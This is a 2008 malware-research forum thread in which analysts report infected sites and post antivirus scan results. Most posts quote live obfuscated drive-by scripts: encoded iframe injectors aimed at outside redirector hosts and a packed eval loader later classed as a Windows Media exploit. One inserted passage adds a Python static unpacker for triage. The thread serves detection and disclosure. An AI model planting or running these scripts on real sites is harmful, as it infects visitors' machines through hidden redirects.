downie
PIRT Handler
 Joined: May 19, 2006 Posts: 3982
MAPKOBKA
Lieutenant
 Premium Member
 Joined: Jul 04, 2007 Posts: 163
Posted: Thu Mar 06, 2008 4:24 pm
Thanks.
Will grab code for listserv
_________________
Kaspersky Lab Forum Moderator
KL Cert PSP
Virusinfo.info External Specialist
Alliance of Security Analysis Professionals Member
http://malwarecrawler.com - honeypot@malwarecrawler.com
maliciousbrains
Sergeant
 Premium Member
 Joined: Feb 23, 2008 Posts: 103
Posted: Thu Mar 06, 2008 5:12 pm
hxxp://alinejoyce.com < Exploit Code
Quote:
<script>
document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%20%69%66%20%28%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%69%6E%64%65%78%4F%66%28%27%4D%53%49%45%27%29%20%21%3D%20%2D%31%29%20%26%26%20%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%69%6E%64%65%78%4F%66%28%27%57%69%6E%64%6F%77%73%20%4E%54%20%35%27%29%20%21%3D%20%2D%31%29%29%20%7B%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%6C%6E%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%74%72%61%66%66%69%6E%2E%69%6E%66%6F%2F%6F%75%74%2E%70%68%70%3F%73%5F%69%64%3D%32%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B%20%7D%3C%2F%73%63%72%69%70%74%3E'));
</script> <script>
document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%20%69%66%20%28%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%69%6E%64%65%78%4F%66%28%27%4D%53%49%45%27%29%20%21%3D%20%2D%31%29%20%26%26%20%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%69%6E%64%65%78%4F%66%28%27%57%69%6E%64%6F%77%73%20%4E%54%20%35%27%29%20%21%3D%20%2D%31%29%29%20%7B%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%6C%6E%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%74%72%61%66%66%69%6E%2E%69%6E%66%6F%2F%6F%75%74%2E%70%68%70%3F%73%5F%69%64%3D%32%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B%20%7D%3C%2F%73%63%72%69%70%74%3E'));
</script> <script>
document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%20%69%66%20%28%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%69%6E%64%65%78%4F%66%28%27%4D%53%49%45%27%29%20%21%3D%20%2D%31%29%20%26%26%20%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%69%6E%64%65%78%4F%66%28%27%57%69%6E%64%6F%77%73%20%4E%54%20%35%27%29%20%21%3D%20%2D%31%29%29%20%7B%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%6C%6E%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%74%72%61%66%66%69%6E%2E%69%6E%66%6F%2F%6F%75%74%2E%70%68%70%3F%73%5F%69%64%3D%32%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B%20%7D%3C%2F%73%63%72%69%70%74%3E'));
</script> <script>function v47c676a40795d(v47c676a408129){ var v47c676a4088fb=16; return(parseInt(v47c676a408129,v47c676a4088fb));}function v47c676a4098a6(v47c676a40a091){ function v47c676a40b862 () {var v47c676a40c055=2; return v47c676a40c055;} var v47c676a40a87c='';for(v47c676a40b06d=0; v47c676a40b06d<v47c676a40a091.length; v47c676a40b06d+=v47c676a40b862()){ v47c676a40a87c+=(String.fromCharCode(v47c676a40795d(v47c676a40a091.substr(v47c676a40b06d, v47c676a40b862()))));}return v47c676a40a87c;} document.write(v47c676a4098a6('3C696672616D65206E616D653D27333732343166643965666227207372633D27687474703A2F2F6262666F72616D612E636F6D2F7464732F696E2E636769272077696474683D333631206865696768743D343432207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script>
File Scripts.txt
Result: 10/32 (31.25%)
Antivirus Version Last Update Result
AhnLab-V3 2008.3.4.0 2008.03.06 -
AntiVir 7.6.0.73 2008.03.06 HEUR/Exploit.HTML
Authentium 4.93.8 2008.03.06 -
Avast 4.7.1098.0 2008.03.06 -
AVG 7.5.0.516 2008.03.06 JS/Psyme
BitDefender 7.2 2008.03.06 -
CAT-QuickHeal 9.50 2008.03.06 -
ClamAV 0.92.1 2008.03.06 JS.Agent-2
DrWeb 4.44.0.09170 2008.03.06 -
eSafe 7.0.15.0 2008.03.06 -
eTrust-Vet 31.3.5591 2008.03.06 -
Ewido 4.0 2008.03.06 -
FileAdvisor 1 2008.03.06 -
Fortinet 3.14.0.0 2008.03.06 -
F-Prot 4.4.2.54 2008.03.05 -
F-Secure 6.70.13260.0 2008.03.06 Trojan-Clicker.JS.Agent.h
Ikarus T3.1.1.20 2008.03.06 -
Kaspersky 7.0.0.125 2008.03.06 Trojan-Clicker.JS.Agent.h
McAfee 5245 2008.03.05 Exploit-IFrame
Microsoft 1.3301 2008.03.06 TrojanDownloader:JS/Psyme.gen
NOD32v2 2927 2008.03.06 -
Norman 5.80.02 2008.03.06 JS/Exploit_based.D
Panda 9.0.0.4 2008.03.06 -
Prevx1 V2 2008.03.06 -
Rising 20.34.32.00 2008.03.06 -
Sophos 4.27.0 2008.03.06 Mal/ObfJS-AB
Sunbelt 3.0.930.0 2008.03.05 -
Symantec 10 2008.03.06 -
TheHacker 6.2.92.233 2008.03.04 -
VBA32 3.12.6.2 2008.03.05 -
VirusBuster 4.3.26:9 2008.03.06 -
Webwasher-Gateway 6.6.2 2008.03.06 Heuristic.Exploit.HTML
Additional information
File size: 3287 bytes
MD5: 8ee7a9cffcb0112d862c2df3414b33f4
SHA1: 56c02b6e54b0d8e3a9f80ed248f6ffc0fb641f52
PEiD: -
ListServ Link:
/p1062933-MD5_8ee7a9cffcb0112d862c2df3414b33f4.html#1062933
_________________
.:: Malicious Brains ::.
http://www.malwareinfo.org
http://blog.malwareinfo.org
http://forum.malwareinfo.org
There are no patches or service packs for ignorance!
maliciousbrains
Sergeant
 Premium Member
 Joined: Feb 23, 2008 Posts: 103
Posted: Thu Mar 06, 2008 5:26 pm
hxxp://chportal.cn/top/count.php?o=2
Quote:
<script>var dydfom=Array(63,0,0,0,0,0,0,0,0,0,0,0,0,0,0,27,20,33,32,47,0,38,39,61,56,0,0,0,0,0,0,31,30,5,46,44,14,42,28,41,43,48,8,53,9,11,1,18,4,12,13,29,21,62,59,34,23,16,0,0,0,0,0,0,58,7,6,17,37,50,49,3,2,60,40,55,52,19,36,22,35,25,26,57,15,54,10,51,24,45);var exzs="7iWkgnak8fC8tpsH2CC!VN0C2aWkei04!NW4VYF42a4zmpwzHPW!m6wzCWNWq@@HDhV92YAaquVt2hV89fV92YVtq@C9k7CtlnNWvIVv7iWkgNsCmv04faNWvnuHoYEenPuH6nAanPuHHuH9Ps4VvnuHXnCtenuH2NCtHnuHo@VeonuH6@Aans4VvnuH2NV92nuHXNVeonuHeqCoknuHZprt304VvnuHUEH9XnuH2@H97nuH3YVo1PuHX7V9H04VvnuH6YVeqnuHPiA9HnuH2YHonPuHUir9X04VvnuH1Ert2nuHXuMeYPuH6nAeYPuHonMe604VvnuHonranPuH2NV9enuH7@AeUPuH2Nrans4VvnuHHurtnPuH3NMt1PuHUpr9XnuH2YAans4VvnuH2NAanPuHPwCoonuH6uCtonuH7YttPs4VvnuH7nttYPuH7YV91PuH7NttPPuHqn09204VvnuHoNt9mPuHqnItmPuH67VtonuH2bVto04VvnuHPcC9XnuH2NVtenuHXbAt2nuH2NHtH04VvnuHebAanPuHHur9PPuH3NHt2nuHHuMoUs4VvnuH27At2nuH2qEenPuHebAanPuHHYH9e04VvnuH6Nrt2nuHebAanPuHknC9PPuHHntoYs4VvnuH2nrt1PuH16EePPuHYAraenuHYAteYPuH1wraXnuHHNA9e04VvnuHqYV9PPuHYAH9PPuHknAe2nuHnAMt204VvnuH3hH97nuH6bV9YPuH7@MeHnuHYAteYs4VvnuHHuteYPuHqYEtenuHHYtePPuHniMtq04VvnuHUEH9XnuHoNEtXnuH1EMtqnuHoNV9e04VvnuHUcVeYPuHnAMtUPuHYPMaHnuH2nraZs4VvnuHoNEeHnuHYAteYPuHHNVeYPuH2YEePs4VvnuHqNraXnuH7uV9enuHUcVeYPuH6ntoYs4VvnuH1EAeHnuH16CtXnuHYArt2nuHYAteYs4VvnuHYAMtqnuH16Ae2nuHYAre6nuHYAteYPuH6YVtHnuH6bCtenuHq@H9ZPuH7NV9YPuH6bVtHnuH6uVtYPuH7hCtenuHqnttPPuH7nttXnuH6YV9YPuH6bVtYPuH70V9YPuH6YVtonuH67VtonuHqnttonuH67VtonuHX@ttonuHXYttYPuHq@C9qnuHXYHtenuHXuC93nuHXYC92nuHXuC9HnuHX@C9qnuHXhC92nuH7qV97nuHXuC9UPuHXYC92nuHXuC97nuHXNC97nuHX7C9knuHq@C96nuHXYtto04a0@wDqc!4VcwWvqA9vl4kowIDmwFkDbCa0qWzth4kowIDmwFk9Iav7iWkgxNFXpak9VIzDna4mwFDJcwztuu8opE9ehE8opE9ehE8opE9ehE8opE9ehE8opE9ehE8opE9ehE8opE9ehE8opE9ehVj9IVv66NC8P0VjXFkeEwC!sW!8PW4vpsCzbAF2qA92bA92qu4kwsHqXW4vFuWjXFkeEwC!sIa0xNFXpak9VIzaxEH!PIkfi0km64ktP048wI4a0u8oEA9XnC89IVv7iWkguwz2vNWxx!jF48zVEsV9fE9Fq0WqbC9HIECaIuVguwz2vIVDuu!xIVvLaIDofNz!pa!6EwCeP0VvlEzjENzLc4kqwNWx04VqP0k8F48ZiMoZEtonEHoPwHoUpreUPMe1PteYAtepsHep6r6r6M6yXM60Ct60FH6sF
r7Tvr7ZiMo1!t7@VH7AaH7ZiMo1hK35i93hE93iwk3ipy2BpK2QPK2bA92bsk2csyXM6yXKXKXKC9XNCy92bA93hE93uV9quC9XNC9eYAtenEtonVt7@Vt60Ct67AaH7EakqEa!0w47E4!40uVF4SI0qWztNwHfwNzXwwVFpI4fPw4mV0H!0ak9pwzt0489IEI0n04XPIFLaIDofNz!pa!6EwCeP0Vv0uVFxav";var cuhj=1960,nsbac,mgepl,gyizlt='',qhgttn=cqbfhl=ivnkd=0;for(mgepl=2;mgepl>0;mgepl--){for(nsbac=Math.min(cuhj,1024);nsbac>0;nsbac--,cuhj--){eval('ivnkd|=(dydfom[exzs.charC'+'odeAt(qhgttn++)-33])<<cqbfhl;');if(cqbfhl){gyizlt+=eval('String.fromCha'+'rCode(209^ivnkd&255)');ivnkd>>=8;cqbfhl-=2}else cqbfhl=6;}}eval(gyizlt);</script>
Doesn't seem to be malware: Result: 0/32 (0%)
However, uploaded file to MMPC for analysis.
Submission has been assigned ID 16000914.
_________________
.:: Malicious Brains ::.
http://www.malwareinfo.org
http://blog.malwareinfo.org
http://forum.malwareinfo.org
There are no patches or service packs for ignorance!
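Added example (not code from this thread or from any of its posters): a Python static unpacker for the two encodings quoted in the two posts above. The first post's script wraps its HTML in `document.write(unescape('%3C...'))` and in a hex-pair decoder (`parseInt(pair, 16)` fed to `String.fromCharCode`); both can be peeled without executing anything, after which the hidden iframe targets, the `navigator.userAgent` gating on MSIE / Windows NT 5, and the width=0 / display:none styling fall out as indicators for blocklists and signatures. The second post's array-and-eval packer computes its payload at runtime, so static peeling finds nothing there; the tool flags the `eval(` call so the analyst knows a sandbox run is needed instead. All function names and regexes are my own, and the samples are constructed with example.invalid hosts rather than the thread's domains.

```python
import re
from urllib.parse import quote, unquote

# Static unpacker for the two encoding layers quoted in this thread:
#   (a) document.write(unescape('%3C%73...'))   -> percent-encoded HTML
#   (b) a hex-pair decoder (parseInt(pair, 16) + String.fromCharCode)
#       fed a long quoted hex string             -> hex-encoded HTML
# The script is never evaluated; only its string literals are decoded.
UNESCAPE_RE = re.compile(r"unescape\(\s*'((?:%[0-9A-Fa-f]{2}|[^'])*)'\s*\)")
HEX_BLOB_RE = re.compile(r"'((?:[0-9A-Fa-f]{2}){8,})'")
IFRAME_TAG_RE = re.compile(r"<iframe\b[^>]*>", re.I)
IFRAME_SRC_RE = re.compile(r"\bsrc\s*=\s*['\"]?([^'\" >]+)", re.I)
HIDDEN_RE = re.compile(r"\b(?:width|height)\s*=\s*['\"]?0\b|display\s*:\s*none", re.I)
UA_GATE_RE = re.compile(r"navigator\.userAgent\.indexOf\(")
EVAL_RE = re.compile(r"\beval\s*\(")


def decode_percent(blob):
    """Reverse JavaScript unescape() on a %XX-encoded string."""
    return unquote(blob)


def decode_hex_pairs(blob):
    """Reverse the parseInt(pair, 16) / fromCharCode loop on a hex string."""
    return bytes.fromhex(blob).decode("latin-1")


def unpack_layers(script, max_depth=5):
    """Peel statically decodable layers; returns [original, layer1, ...]."""
    layers = [script]
    for _ in range(max_depth):
        current = layers[-1]
        decoded = [decode_percent(m.group(1)) for m in UNESCAPE_RE.finditer(current)]
        for m in HEX_BLOB_RE.finditer(current):
            try:
                decoded.append(decode_hex_pairs(m.group(1)))
            except ValueError:
                pass  # not a hex payload after all
        if not decoded:
            break  # nothing left that can be decoded without running the script
        layers.append("\n".join(decoded))
    return layers


def triage(script):
    """Collect the indicators an analyst would pull from a quoted script."""
    layers = unpack_layers(script)
    targets, hidden = [], 0
    for layer in layers:
        for tag in IFRAME_TAG_RE.findall(layer):
            src = IFRAME_SRC_RE.search(tag)
            if src and src.group(1) not in targets:
                targets.append(src.group(1))
            if HIDDEN_RE.search(tag):
                hidden += 1
    return {
        "layers": len(layers),
        "iframe_targets": targets,
        "hidden_iframes": hidden,
        "ua_gated": any(UA_GATE_RE.search(layer) for layer in layers),
        "uses_eval": any(EVAL_RE.search(layer) for layer in layers),
    }


# Constructed sample in the shape of the first quoted script (example.invalid
# hosts, not the thread's domains): a UA-gated hidden iframe inside unescape(),
# plus a hex-encoded hidden iframe as the custom decoder 'dec' would unpack it.
INNER_A = (
    "<script type=\"text/javascript\"> if ((navigator.userAgent.indexOf('MSIE') != -1)"
    " && (navigator.userAgent.indexOf('Windows NT 5') != -1)) { document.writeln("
    "'<iframe src=\"http://redirector.example.invalid/out.php?s_id=2\" frameborder=0"
    " width=0 height=0></iframe>'); }</script>"
)
INNER_B = ("<iframe name='a1b2c3' src='http://tds.example.invalid/in.cgi' width=361"
           " height=442 style='display:none'></iframe>")
SAMPLE_STATIC = (
    "<script>document.write(unescape('" + quote(INNER_A, safe="") + "'));</script>"
    "<script>document.write(dec('" + INNER_B.encode().hex().upper() + "'));</script>"
)
# Constructed sample in the shape of the second quoted script: the payload is
# built at runtime and handed to eval(), so static peeling finds nothing.
SAMPLE_EVAL = "<script>var t=Array(63,0,0);var s='...';var o='';eval(o);</script>"

if __name__ == "__main__":
    print(triage(SAMPLE_STATIC))
    print(triage(SAMPLE_EVAL))
```

On the first sample `triage` reports two layers, both iframe targets, two hidden iframes and the user-agent gate; on the second it reports a single layer, no targets and `uses_eval`, which is the cue to hand the script to a sandbox rather than trust the static result. Feeding the `unescape` blobs and the hex string from the first post above to the same functions yields those posts' iframe destinations.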
bobby_
MIRT Hunter
 Joined: Nov 04, 2006 Posts: 237 Location: Austria
Posted: Thu Mar 06, 2008 5:53 pm
@maliciousbrains
It is a WMV exploit for sure.
_________________
ASAP member
MAPKOBKA
Lieutenant
 Premium Member
 Joined: Jul 04, 2007 Posts: 163
Posted: Thu Mar 06, 2008 7:15 pm
It probably would be best if you showed the separate MD5's because now I don't know which ones (samples) you have uploaded to listserv and which you haven't.
Also I don't think it is good if we are both uploading the same code from listserv...
_________________
Kaspersky Lab Forum Moderator
KL Cert PSP
Virusinfo.info External Specialist
Alliance of Security Analysis Professionals Member
http://malwarecrawler.com - honeypot@malwarecrawler.com
maliciousbrains
Sergeant
 Premium Member
 Joined: Feb 23, 2008 Posts: 103
Posted: Fri Mar 07, 2008 5:57 am
Quote:
It probably would be best if you showed the separate MD5's because now I don't know which ones (samples) you have uploaded to listserv and which you haven't.
Also I don't think it is good if we are both uploading the same code from listserv...
MAPKOBKA > If I upload any file in the listserv then I always include the link in the post. About my 2nd comment in this post, I haven't uploaded that script to listserv, however I did upload that script to MMPC for further analysis.
Below is the response from MMPC:
Analysis summary:
=================
Total Files: 1
Clean: 0
Malware: 1
Malware Related: 0
Malware Container: 0
Potentially Unwanted Software: 0
Potentially Unwanted Software Container: 0
Postponed: 0
Not Yet Analyzed: 0
=================
Per-file summary:
=================
20080306_092325594_0_Scripts2.txt | Malware: Exploit:JS/MS06006.E
http://go.microsoft.com/fwlink/?linkid=95666&name=Exploit%3aJS%2fMS06006.E
If you want you can upload the 2nd script to listserv as it was also detected as genuine malware.
_________________
.:: Malicious Brains ::.
http://www.malwareinfo.org
http://blog.malwareinfo.org
http://forum.malwareinfo.org
There are no patches or service packs for ignorance!
maliciousbrains
Sergeant
 Premium Member
 Joined: Feb 23, 2008 Posts: 103
Posted: Fri Mar 07, 2008 3:17 pm
hxxp://chportal.cn/top/count.php?o=2
Exploit Code in link.
VirusTotal Result: 1/32
Antivirus Version Last Update Result
AhnLab-V3 2008.3.4.0 2008.03.07 -
AntiVir 7.6.0.73 2008.03.07 -
Authentium 4.93.8 2008.03.07 -
Avast 4.7.1098.0 2008.03.07 -
AVG 7.5.0.516 2008.03.07 -
BitDefender 7.2 2008.03.07 -
CAT-QuickHeal 9.50 2008.03.06 -
ClamAV 0.92.1 2008.03.07 -
DrWeb 4.44.0.09170 2008.03.07 -
eSafe 7.0.15.0 2008.03.06 -
eTrust-Vet 31.3.5595 2008.03.07 -
Ewido 4.0 2008.03.07 -
FileAdvisor 1 2008.03.07 -
Fortinet 3.14.0.0 2008.03.07 -
F-Prot 4.4.2.54 2008.03.07 -
F-Secure 6.70.13260.0 2008.03.07 -
Ikarus T3.1.1.20 2008.03.07 -
Kaspersky 7.0.0.125 2008.03.07 -
McAfee 5246 2008.03.06 -
Microsoft 1.3301 2008.03.06 - Exploit:JS/MS06006.E
NOD32v2 2930 2008.03.07 -
Norman 5.80.02 2008.03.06 -
Panda 9.0.0.4 2008.03.06 -
Prevx1 V2 2008.03.07 -
Rising 20.34.42.00 2008.03.07 -
Sophos 4.27.0 2008.03.07 -
Sunbelt 3.0.930.0 2008.03.05 -
Symantec 10 2008.03.07 -
TheHacker 6.2.92.235 2008.03.07 -
VBA32 3.12.6.2 2008.03.05 -
VirusBuster 4.3.26:9 2008.03.07 -
Webwasher-Gateway 6.6.2 2008.03.07 -
Additional information
File size: 2608 bytes
MD5: efd7976f854deb71f4fdd0394d8750c6
SHA1: e229583f4cf5ef30e87e614a6600e2bdbd6ac41a
PEiD: -
However, uploaded file to MMPC for analysis.
Submission has been assigned ID 16000914.
Below is the response from MMPC:
Analysis summary:
=================
Total Files: 1
Clean: 0
Malware: 1
Malware Related: 0
Malware Container: 0
Potentially Unwanted Software: 0
Potentially Unwanted Software Container: 0
Postponed: 0
Not Yet Analyzed: 0
=================
Per-file summary:
=================
20080306_092325594_0_Scripts2.txt | Malware: Exploit:JS/MS06006.E
http://go.microsoft.com/fwlink/?linkid=95666&name=Exploit%3aJS%2fMS06006.E
Added to ListServ:
/p1063223-MD5_efd7976f854deb71f4fdd0394d8750c6.html#1063223
_________________
.:: Malicious Brains ::.
http://www.malwareinfo.org
http://blog.malwareinfo.org
http://forum.malwareinfo.org
There are no patches or service packs for ignorance!
Powered by phpBB © 2001 phpBB Group